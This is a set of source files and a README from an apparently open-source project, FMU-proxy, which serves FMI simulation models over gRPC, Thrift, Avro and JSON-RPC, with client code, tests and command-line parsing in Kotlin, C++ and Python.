"src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.runInstance\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@EnabledOnOs(OS.WINDOWS)\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestGrpcBouncingCS {\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(TestGrpcBouncingCS::class.java)\n }\n\n private val fmu: Fmu\n private val server: GrpcFmuServer\n private val client: GrpcFmuClient\n private val modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/win64/FMUSDK/2.0.4/BouncingBall/bouncingBall.fmu\"))\n modelDescription = fmu.modelDescription\n\n server = GrpcFmuServer(fmu)\n val port = server.start()\n\n client = GrpcFmuClient(\"localhost\", port)\n\n }\n\n @AfterAll\n fun tearDown() {\n client.close()\n server.stop()\n fmu.close()\n }\n \n @Test\n fun testModelName() {\n val modelName = client.modelDescription.modelName.also { LOG.info(\"modelName=$it\") }\n Assertions.assertEquals(modelDescription.modelName, modelName)\n }\n\n @Test\n fun testGuid() {\n val guid = client.modelDescription.guid.also { LOG.info(\"guid=$it\") }\n Assertions.assertEquals(modelDescription.guid, guid)\n }\n\n @Test\n fun testInstance() {\n\n client.newInstance().use { instance ->\n\n val h = client.modelDescription.modelVariables\n .getByName(\"h\").asRealVariable()\n\n val dt = 1.0/100\n val stop = 100.0\n runInstance(instance, dt, stop, {\n h.read()\n }).also {\n LOG.info(\"Duration: ${it}ms\")\n }\n\n }\n\n }\n\n}\n" }, { "alpha_fraction": 0.587202787399292, "alphanum_fraction": 0.5968976616859436, "avg_line_length": 41.97806930541992, "blob_id": "85a2653215e79a098800db5d4e508c0f28d590c3", "content_id": "a1803a0a283e168d103397f05cdd6e3495f166a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9799, "license_type": "permissive", "max_line_length": 118, "num_lines": 228, "path": "/cpp/FMU-proxy/common/ThriftHelper.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright 
notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#ifndef FMU_PROXY_THRIFTHELPER_H\n#define FMU_PROXY_THRIFTHELPER_H\n\n#include <cfloat>\n#include <fmilib.h>\n#include \"thrift-gen/definitions_types.h\"\n\nusing namespace ::fmuproxy::thrift;\n\nnamespace fmuproxy {\n    namespace thrift_helper {\n\n        // helpers mapping fmilib enums and variable attributes to the corresponding Thrift types\n\n        Status::type thriftType(fmi2_status_t status) {\n            switch (status) {\n                case fmi2_status_ok:\n                    return Status::type::OK_STATUS;\n                case fmi2_status_warning:\n                    return Status::type::WARNING_STATUS;\n                case fmi2_status_pending:\n                    return Status::type::PENDING_STATUS;\n                case fmi2_status_discard:\n                    return Status::type::DISCARD_STATUS;\n                case fmi2_status_error:\n                    return Status::type::ERROR_STATUS;\n                case fmi2_status_fatal:\n                    return Status::type::FATAL_STATUS;\n            }\n        }\n\n        Causality::type thriftType(fmi2_causality_enu_t causality) {\n            switch (causality) {\n                case fmi2_causality_enu_input:\n                    return Causality::type::INPUT_CAUSALITY;\n                case fmi2_causality_enu_output:\n                    return Causality::type::OUTPUT_CAUSALITY;\n                case fmi2_causality_enu_parameter:\n                    return Causality::type::PARAMETER_CAUSALITY;\n                case fmi2_causality_enu_local:\n                    return Causality::type::LOCAL_CAUSALITY;\n                case fmi2_causality_enu_independent:\n                    return Causality::type::INDEPENDENT_CAUSALITY;\n                case fmi2_causality_enu_calculated_parameter:\n                    return Causality::type::CALCULATED_PARAMETER_CAUSALITY;\n                case fmi2_causality_enu_unknown:\n                    return Causality::type::LOCAL_CAUSALITY;\n            }\n        }\n\n        Variability::type thriftType(fmi2_variability_enu_t variability) {\n            switch (variability) {\n                case fmi2_variability_enu_constant:\n                    return Variability::type::CONSTANT_VARIABILITY;\n                case fmi2_variability_enu_continuous:\n                    return Variability::type::CONTINUOUS_VARIABILITY;\n                case fmi2_variability_enu_discrete:\n                    return Variability::type::DISCRETE_VARIABILITY;\n                case fmi2_variability_enu_fixed:\n                    return Variability::type::FIXED_VARIABILITY;\n                case fmi2_variability_enu_unknown:\n                    return Variability::type::CONTINUOUS_VARIABILITY;\n            }\n        }\n\n        Initial::type thriftType(fmi2_initial_enu_t initial) {\n            switch (initial) {\n                case fmi2_initial_enu_approx:\n                    return Initial::type::APPROX_INITIAL;\n                case fmi2_initial_enu_calculated:\n                    return Initial::type::CALCULATED_INITIAL;\n                case fmi2_initial_enu_exact:\n                    return Initial::type::EXACT_INITIAL;\n                case fmi2_initial_enu_unknown:\n                    return Initial::type::APPROX_INITIAL;\n            }\n        }\n\n        IntegerAttribute\n        thriftType(fmi2_import_variable_t *variable, fmi2_import_integer_variable_t *integer_variable) {\n            IntegerAttribute attribute;\n\n            if (fmi2_import_get_variable_has_start(variable)) {\n                attribute.__set_start(fmi2_import_get_integer_variable_start(integer_variable));\n            }\n            const auto min = fmi2_import_get_integer_variable_min(integer_variable);\n            attribute.__set_min(min);\n\n            const auto max = fmi2_import_get_integer_variable_max(integer_variable);\n            attribute.__set_max(max);\n\n            return attribute;\n        }\n\n        RealAttribute thriftType(fmi2_import_variable_t 
*variable, fmi2_import_real_variable_t *real_variable) {\n RealAttribute attribute;\n if (fmi2_import_get_variable_has_start(variable)) {\n attribute.__set_start(fmi2_import_get_real_variable_start(real_variable));\n }\n fmi2_real_t min = fmi2_import_get_real_variable_min(real_variable);\n if (min != -DBL_MAX) {\n attribute.__set_min(min);\n }\n fmi2_real_t max = fmi2_import_get_real_variable_max(real_variable);\n if (max != DBL_MAX) {\n attribute.__set_max(max);\n }\n return attribute;\n }\n\n StringAttribute thriftType(fmi2_import_variable_t *variable, fmi2_import_string_variable_t *string_variable) {\n StringAttribute attribute;\n if (fmi2_import_get_variable_has_start(variable)) {\n attribute.__set_start(fmi2_import_get_string_variable_start(string_variable));\n }\n return attribute;\n }\n\n BooleanAttribute thriftType(fmi2_import_variable_t *variable, fmi2_import_bool_variable_t *bool_variable) {\n BooleanAttribute attribute;\n if (fmi2_import_get_variable_has_start(variable)) {\n attribute.__set_start(fmi2_import_get_boolean_variable_start(bool_variable));\n }\n return attribute;\n }\n\n\n void get_scalar_variable(fmi2_import_variable_t *v, ScalarVariable &var) {\n\n var.__set_name(fmi2_import_get_variable_name(v));\n var.__set_valueReference(fmi2_import_get_variable_vr(v));\n\n const char *description = fmi2_import_get_variable_description(v);\n if (description != nullptr) {\n var.__set_description(description);\n }\n\n var.__set_causality(thriftType(fmi2_import_get_causality(v)));\n var.__set_variability(thriftType(fmi2_import_get_variability(v)));\n var.__set_initial(thriftType(fmi2_import_get_initial(v)));\n\n fmi2_base_type_enu_t type = fmi2_import_get_variable_base_type(v);\n switch (type) {\n case fmi2_base_type_int:\n var.attribute.__set_integerAttribute(thriftType(v, fmi2_import_get_variable_as_integer(v)));\n break;\n case fmi2_base_type_real:\n var.attribute.__set_realAttribute(thriftType(v, fmi2_import_get_variable_as_real(v)));\n break;\n case fmi2_base_type_str:\n var.attribute.__set_stringAttribute(thriftType(v, fmi2_import_get_variable_as_string(v)));\n break;\n case fmi2_base_type_bool:\n var.attribute.__set_booleanAttribute(thriftType(v, fmi2_import_get_variable_as_boolean(v)));\n break;\n }\n\n }\n\n void get_model_variables(fmi2_import_t *xml, ModelVariables &modelVariables) {\n\n const auto list = fmi2_import_get_variable_list(xml, 0);\n unsigned int size = fmi2_import_get_variable_list_size(list);\n\n for (unsigned int i = 0; i < size; ++i) {\n fmi2_import_variable_t *v = fmi2_import_get_variable(list, i);\n ScalarVariable var;\n get_scalar_variable(v, var);\n modelVariables.push_back(var);\n }\n\n fmi2_import_free_variable_list(list);\n\n }\n\n void get_model_description(fmi_version_enu_t fmi_version, fmi2_import_t *xml, ModelDescription &md) {\n\n md.__set_guid(fmi2_import_get_GUID(xml));\n md.__set_version(fmi2_import_get_model_standard_version(xml));\n md.__set_fmiVersion(fmi_version_to_string(fmi_version));\n md.__set_modelName(fmi2_import_get_model_name(xml));\n md.__set_author(fmi2_import_get_author(xml));\n md.__set_copyright(fmi2_import_get_copyright(xml));\n md.__set_description(fmi2_import_get_description(xml));\n md.__set_generationTool(fmi2_import_get_generation_tool(xml));\n md.__set_generationDateAndTime(fmi2_import_get_generation_date_and_time(xml));\n md.__set_license(fmi2_import_get_license(xml));\n\n DefaultExperiment ex;\n ex.startTime = fmi2_import_get_default_experiment_start(xml);\n ex.stopTime = 
fmi2_import_get_default_experiment_stop(xml);\n            ex.tolerance = fmi2_import_get_default_experiment_tolerance(xml);\n            ex.stepSize = fmi2_import_get_default_experiment_step(xml);\n            md.__set_defaultExperiment(ex);\n\n            ModelVariables modelVariables;\n            get_model_variables(xml, modelVariables);\n            md.__set_modelVariables(modelVariables);\n\n        }\n\n    }\n}\n\n#endif //FMU_PROXY_THRIFTHELPER_H\n" }, { "alpha_fraction": 0.6093928813934326, "alphanum_fraction": 0.6254295706748962, "avg_line_length": 23.828571319580078, "blob_id": "18d05c9a29a265646ab7b3a457542c554955d37f", "content_id": "3921afdff734e1e6a19881dfd1a60c700e26ec45", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 873, "license_type": "permissive", "max_line_length": 79, "num_lines": 35, "path": "/python/grpc-client/test.py", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nimport time\nimport client\n\nclient = client.FmuClient(\"localhost\", 8000)\n\nmodel_name = client.model_description.model_name\nprint(\"ModelName={}\".format(model_name))\n\nfmu = client.create_instance()\n\nvariables = fmu.model_variables\nfor key in variables:\n    v = variables[key]\n    if v.causality == 2:\n        print(v)\n\nif fmu.init():\n\n    dt = 1.0/100\n    start = time.time()\n    t = fmu.get_current_time()\n    while t < 10:\n        step = fmu.step(dt)\n        t = step.simulation_time\n        if step.status != 0:\n            print(\"Error: t={}, FMU returned status {}\".format(t, step.status))\n            break\n    end = time.time()\n\n    print(\"Elapsed={}s\".format(end-start))\n\n    reader = fmu.get_reader(\"PistonDisplacement\")\n    print(\"PistonDisplacement={}\".format(reader.read_real().value))\n\nprint(\"Terminated with success: {}\".format(fmu.terminate().status == 0))\n\n\n\n" }, { "alpha_fraction": 0.6776803731918335, "alphanum_fraction": 0.6795347332954407, "avg_line_length": 35.368099212646484, "blob_id": "c08de542befff86627c4e05337f04509dc66f122", "content_id": "171a4aff7ee4740342c484bb031ea95944fe02bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5932, "license_type": "permissive", "max_line_length": 225, "num_lines": 163, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/cli/CommandLineParser.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.cli\n\nimport info.laht.yajrpc.RpcHandler\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.FmuProxy\nimport no.mechatronics.sfi.fmuproxy.FmuProxyBuilder\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.FmuProxyJsonHttpServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.FmuProxyJsonTcpServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.FmuProxyJsonWsServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.FmuProxyJsonZmqServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.net.SimpleSocketAddress\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuServer\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport picocli.CommandLine\nimport java.io.File\nimport java.net.MalformedURLException\nimport java.net.URL\nimport java.util.concurrent.Callable\n\nval LOG: Logger = LoggerFactory.getLogger(CommandLineParser::class.java)\n\nobject CommandLineParser {\n\n    fun parse(args: Array<String>): FmuProxy? {\n        return CommandLine.call(Args(), System.out, *args)\n    }\n\n}\n\n\ninternal class SimpleSocketAddressConverter: CommandLine.ITypeConverter<SimpleSocketAddress> {\n    override fun convert(value: String): SimpleSocketAddress {\n        return SimpleSocketAddress.parse(value)\n    }\n}\n\n\[email protected](name = \"fmu-proxy\")\nclass Args: Callable<FmuProxy> {\n\n    @CommandLine.Option(names = [\"-h\", \"--help\"], description = [\"Prints this message and quits.\"], usageHelp = true)\n    var showHelp = false\n\n    @CommandLine.Option(names = [\"-fmu\", \"--fmuPath\"], description = [\"Path to the FMU.\"], required = true)\n    lateinit var fmuPath: String\n\n    @CommandLine.Option(names = [\"-r\", \"--remote\"], description = [\"Specify an address for the remote tracking server (optional).\"], converter = [SimpleSocketAddressConverter::class])\n    var remote: SimpleSocketAddress? = null\n\n    @CommandLine.Option(names = [\"-grpc\"], description = [\"Manually specify the gRPC port (optional).\"])\n    var grpcPort: Int? = null\n\n    @CommandLine.Option(names = [\"-thrift\"], description = [\"Manually specify the Thrift port (optional).\"])\n    var thriftPort: Int? = null\n\n    @CommandLine.Option(names = [\"-avro\"], description = [\"Manually specify the Avro port (optional).\"])\n    var avroPort: Int? = null\n\n    @CommandLine.Option(names = [\"-jsonrpc/http\"], description = [\"Manually specify the JSON-RPC HTTP port (optional).\"])\n    var jsonHttpPort: Int? = null\n\n    @CommandLine.Option(names = [\"-jsonrpc/ws\"], description = [\"Manually specify the JSON-RPC WS port (optional).\"])\n    var jsonWsPort: Int? = null\n\n    @CommandLine.Option(names = [\"-jsonrpc/tcp\"], description = [\"Manually specify the JSON-RPC TCP/IP port (optional).\"])\n    var jsonTcpPort: Int? = null\n\n    @CommandLine.Option(names = [\"-jsonrpc/zmq\"], description = [\"Manually specify the JSON-RPC ZMQ port (optional).\"])\n    var jsonZmqPort: Int? = null\n\n\n    override fun call(): FmuProxy? {\n\n        LOG.debug(\"FmuPath=$fmuPath\")\n\n        val fmu = File(fmuPath).let {file ->\n\n            if (file.exists()) {\n                Fmu.from(file)\n            } else {\n                try {\n                    val url = URL(fmuPath)\n                    Fmu.from(url)\n                } catch (ex: MalformedURLException) {\n                    LOG.error(\"Interpreted fmuPath as a URL, but a MalformedURLException was thrown\", ex)\n                    null\n                }\n            }\n\n        }\n\n        fmu ?: return null\n\n        return FmuProxyBuilder(fmu).apply {\n\n            setRemote(remote)\n\n            GrpcFmuServer(fmu).apply {\n                addServer(this, grpcPort)\n            }\n\n            ThriftFmuServer(fmu).apply {\n                addServer(this, thriftPort)\n            }\n\n            AvroFmuServer(fmu).apply {\n                addServer(this, avroPort)\n            }\n\n            val handler = RpcHandler(RpcFmuService(fmu))\n            FmuProxyJsonHttpServer(handler).apply {\n                addServer(this, jsonHttpPort)\n            }\n\n            FmuProxyJsonWsServer(handler).apply {\n                addServer(this, jsonWsPort)\n            }\n\n            FmuProxyJsonTcpServer(handler).apply {\n                addServer(this, jsonTcpPort)\n            }\n\n            FmuProxyJsonZmqServer(handler).apply {\n                addServer(this, jsonZmqPort)\n            }\n\n        }.build()\n    }\n\n    override fun toString(): String {\n        return \"Args(fmuPath='$fmuPath', remote=$remote, grpcPort=$grpcPort, thriftPort=$thriftPort, avroPort=$avroPort, jsonHttpPort=$jsonHttpPort, jsonWsPort=$jsonWsPort, jsonTcpPort=$jsonTcpPort, jsonZmqPort=$jsonZmqPort)\"\n    }\n\n\n}\n\n\n\n\n" }, { "alpha_fraction": 0.7041139006614685, "alphanum_fraction": 0.7072784900665283, "avg_line_length": 27.772727966308594, "blob_id": "fdfb6f9a36c129dd2ad850c24b3944ed1f07e250", "content_id": "28e3e0b8ce3115c93b0190ca4b53b9c7db4d3756", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 632, "license_type": "permissive", "max_line_length": 118, "num_lines": 22, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/util.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport org.junit.jupiter.api.Assertions\nimport kotlin.system.measureTimeMillis\n\n\ninternal inline fun runInstance(instance: FmiSimulation, dt: Double, stop: Double, callback: () -> Unit = {}) : Long {\n\n    instance.init()\n    Assertions.assertEquals(FmiStatus.OK, instance.lastStatus)\n\n    return measureTimeMillis {\n        while (instance.currentTime < stop) {\n            val status = instance.doStep(dt)\n            Assertions.assertTrue(status)\n            callback()\n        }\n    }\n\n}" }, { "alpha_fraction": 0.5983431935310364, "alphanum_fraction": 0.6016567945480347, "avg_line_length": 29.39568328857422, "blob_id": "d8123ddca0ee0a529485f95c6bb61f7fcf0edb09", "content_id": "ca91bacc777cd7bcc96ac3caafd4fc2a32559", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4225, "license_type": "permissive", "max_line_length": 87, "num_lines": 139, "path": "/cpp/FMU-proxy/client/ThriftClient.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#ifndef FMU_PROXY_THRIFTCLIENT_H\n#define FMU_PROXY_THRIFTCLIENT_H\n\n\n#include <thrift/transport/TSocket.h>\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/transport/TTransportUtils.h>\n\n#include \"../common/thrift-gen/FmuService.h\"\n\nusing namespace apache::thrift;\nusing namespace fmuproxy::thrift;\nusing namespace apache::thrift::protocol;\nusing namespace apache::thrift::transport;\n\nnamespace fmuproxy {\n    namespace client {\n\n        class RemoteFmuInstance {\n\n        private:\n            FmuId fmu_id;\n            double current_time;\n            std::shared_ptr<FmuServiceClient> client;\n\n        public:\n            RemoteFmuInstance(FmuId fmu_id, std::shared_ptr<FmuServiceClient> client) {\n                this->fmu_id = fmu_id;\n                this->client = client;\n\n                current_time = client->getCurrentTime(fmu_id);\n\n            }\n\n            double getCurrentTime() {\n                return current_time;\n            }\n\n            Status::type init() {\n                return init(0.0, 0.0);\n            }\n\n            Status::type init(double start) {\n                return init(start, 0.0);\n            }\n\n            Status::type init(double start, double stop) {\n                return client->init(fmu_id, start, stop);\n            }\n\n            void step(StepResult& result, double step_size) {\n                client->step(result, fmu_id, step_size);\n                current_time = result.simulationTime;\n            }\n\n            Status::type terminate() {\n                return client->terminate(fmu_id);\n            }\n\n            Status::type reset() {\n                return client->reset(fmu_id);\n            }\n\n            void readInteger(IntegerRead& read, ValueReference vr) {\n                return client->readInteger(read, fmu_id, vr);\n            }\n\n            void readReal(RealRead &read, ValueReference vr) {\n                return client->readReal(read, fmu_id, vr);\n            }\n\n            void readString(StringRead &read, ValueReference vr) {\n                return client->readString(read, fmu_id, vr);\n            }\n\n            void readBoolean(BooleanRead &read, ValueReference vr) {\n                return client->readBoolean(read, fmu_id, vr);\n            }\n\n            ~RemoteFmuInstance() {\n                std::cout << \"RemoteFmuInstance destructor called\" << std::endl;\n            }\n\n        };\n\n        class ThriftClient {\n\n        private:\n\n            std::shared_ptr<TTransport> transport;\n            std::shared_ptr<FmuServiceClient> client;\n\n            std::shared_ptr<ModelDescription> modelDescription;\n\n        public:\n            ThriftClient(const char* host, int port);\n\n            std::shared_ptr<ModelDescription> getModelDescription();\n\n            std::shared_ptr<RemoteFmuInstance> newInstance();\n\n            void close() {\n                transport->close();\n            }\n\n            ~ThriftClient() {\n                std::cout << \"ThriftClient destructor called\" << std::endl;\n            }\n\n        };\n\n    }\n}\n\n#endif //FMU_PROXY_THRIFTCLIENT_H\n" }, { "alpha_fraction": 0.715708315372467, "alphanum_fraction": 0.7160295248031616, "avg_line_length": 74.8780517578125, "blob_id": "17af5e0a9b3c7518e1cfad22f662bd91bfac0485", "content_id": "c1977f70f53040a2eb6d09a61dad05422d6f4108", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3113, "license_type": "permissive", "max_line_length": 829, "num_lines": 41, "path": "/README.md", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "## FMU-proxy\n\nThe main goal of the Functional Mock-up Interface (FMI) standard is to allow simulation models to be shared across tools. To accomplish this, FMI relies on a combination of XML-files and compiled C-code packaged in a zip archive. This archive is called a Functional Mock-up Unit (FMU) and uses the extension .fmu. In theory, an FMU can support multiple platforms; however, this is not always the case, as it depends on the type of binaries the exporting tool was able to provide. Furthermore, a library providing FMI support may not be available in a particular language or platform, and/or it may not support the whole standard. Another issue is related to the protection of Intellectual Property (IP). While an FMU is free to only provide the C-code in its binary form, other resources shipped with the FMU may be unprotected. \n\nIn order to overcome these challenges, this paper presents an open-source framework for working with functional mock-up units across languages and platforms: a single FMU is wrapped inside a server program that supports multiple language-independent Remote Procedure Call (RPC) protocols over several network transports. Currently, Apache Thrift (TCP/IP), Apache Avro (TCP/IP), gRPC (HTTP/2) and JSON-RPC (HTTP, WebSockets, TCP/IP, ZMQ) are supported. Together, they allow FMUs to be invoked from virtually any language on any platform.\nAs users don't have direct access to the FMU or the resources within it, IP is effectively protected. \n\n\n### Generating the server from an FMU\n\n```\nUsage: fmu-proxy-gen [-h] -fmu=<fmuPath> [-out=<out>]\n  -fmu, --fmuPath=<fmuPath>\n                  Path to the fmu.\n  -h, --help      Prints this message and quits.\n  -out, --output=<out>   Specify where to copy the generated .jar (optional)\n```\n\nThis will create a self-executable JAR named after the FMU, e.g. \"myfmu.jar\".\n\n```\nUsage: fmu-proxy [-h] [-avro=<avroPort>] [-grpc=<grpcPort>]\n                 [-jsonrpc/http=<jsonHttpPort>] [-jsonrpc/tcp=<jsonTcpPort>]\n                 [-jsonrpc/ws=<jsonWsPort>] [-jsonrpc/zmq=<jsonZmqPort>]\n                 [-r=<remote>] [-thrift=<thriftPort>]\n  -h, --help Prints this message and quits.\n  -r, --remote=<remote> Specify an address for the remote tracking server (optional).\n  -avro=<avroPort> Manually specify the Avro port (optional).\n  -grpc=<grpcPort> Manually specify the gRPC port (optional).\n  -thrift=<thriftPort> Manually specify the Thrift port (optional).\n  -jsonrpc/http=<jsonHttpPort> Manually specify the JSON-RPC HTTP port (optional).\n  -jsonrpc/tcp=<jsonTcpPort> Manually specify the JSON-RPC TCP/IP port (optional).\n  -jsonrpc/ws=<jsonWsPort> Manually specify the JSON-RPC WS port (optional).\n  -jsonrpc/zmq=<jsonZmqPort> Manually specify the JSON-RPC ZMQ port (optional).\n```\n\nYou can now connect to the FMU in the language of your choosing, using one of the schemas available from the web server or located [here](rpc-definitions).
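\n\nFor example, assuming the server above was started with its gRPC endpoint on port 8000 (e.g. `java -jar myfmu.jar -grpc=8000`; the actual JAR name follows your FMU), the minimal Python sketch below — modelled on the bundled test script in [python/grpc-client](python/grpc-client) — steps the FMU remotely. Host, port and the stop time are placeholder assumptions, not fixed defaults:\n\n```\nimport client  # the FmuClient wrapper from python/grpc-client\n\nproxy = client.FmuClient(\"localhost\", 8000)  # placeholder host/port\nprint(\"ModelName={}\".format(proxy.model_description.model_name))\n\n# every create_instance() call spawns an independent FMU instance on the server\nfmu = proxy.create_instance()\nif fmu.init():\n    dt = 1.0/100\n    t = fmu.get_current_time()\n    while t < 10:  # placeholder stop time\n        step = fmu.step(dt)\n        t = step.simulation_time\n        if step.status != 0:\n            break  # the FMU reported a non-OK status\n\nprint(\"Terminated with success: {}\".format(fmu.terminate().status == 0))\n```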
